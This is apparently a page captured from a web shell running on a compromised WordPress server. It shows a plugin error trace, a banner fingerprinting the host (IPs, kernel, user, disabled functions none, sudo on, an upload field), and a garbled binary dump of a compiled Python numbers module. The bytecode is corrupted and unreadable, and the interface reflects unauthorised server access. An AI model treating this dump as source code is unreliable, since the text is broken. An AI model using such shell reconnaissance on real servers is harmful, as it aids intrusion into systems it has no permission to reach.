Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /snap/core20/2769/lib/python3.8/__pycache__/ |
Upload File : |
U
yi( � @ s� d Z ddlmZmZ dddddgZG dd� ded �ZG d
d� de�Ze�e� G dd� de�Z e �e
� G dd� de �ZG d
d� de�Ze�e
� dS )z~Abstract Base Classes (ABCs) for numbers, according to PEP 3141.
TODO: Fill out more detailed documentation on the operators.� )�ABCMeta�abstractmethod�Number�Complex�Real�Rational�Integralc @ s e Zd ZdZdZdZdS )r z�All numbers inherit from this class.
If you just want to check if an argument x is a number, without
caring what kind, use isinstance(x, Number).
� N)�__name__�
__module__�__qualname__�__doc__� __slots__�__hash__r r r �/usr/lib/python3.8/numbers.pyr s )� metaclassc @ s� e Zd ZdZdZedd� �Zdd� Zeedd� ��Z eed d
� ��Z
edd� �Zed
d� �Zedd� �Z
edd� �Zdd� Zdd� Zedd� �Zedd� �Zedd� �Zedd� �Zedd � �Zed!d"� �Zed#d$� �Zed%d&� �Zed'd(� �Zd)S )*r ab Complex defines the operations that work on the builtin complex type.
In short, those are: a conversion to complex, .real, .imag, +, -,
*, /, abs(), .conjugate, ==, and !=.
If it is given heterogeneous arguments, and doesn't have special
knowledge about them, it should fall back to the builtin complex
type as described below.
r c C s dS )z<Return a builtin complex instance. Called for complex(self).Nr ��selfr r r �__complex__- s zComplex.__complex__c C s | dkS )z)True if self != 0. Called for bool(self).r r r r r r �__bool__1 s zComplex.__bool__c C s t �dS )zXRetrieve the real component of this number.
This should subclass Real.
N��NotImplementedErrorr r r r �real5 s zComplex.realc C s t �dS )z]Retrieve the imaginary component of this number.
This should subclass Real.
Nr r r r r �imag>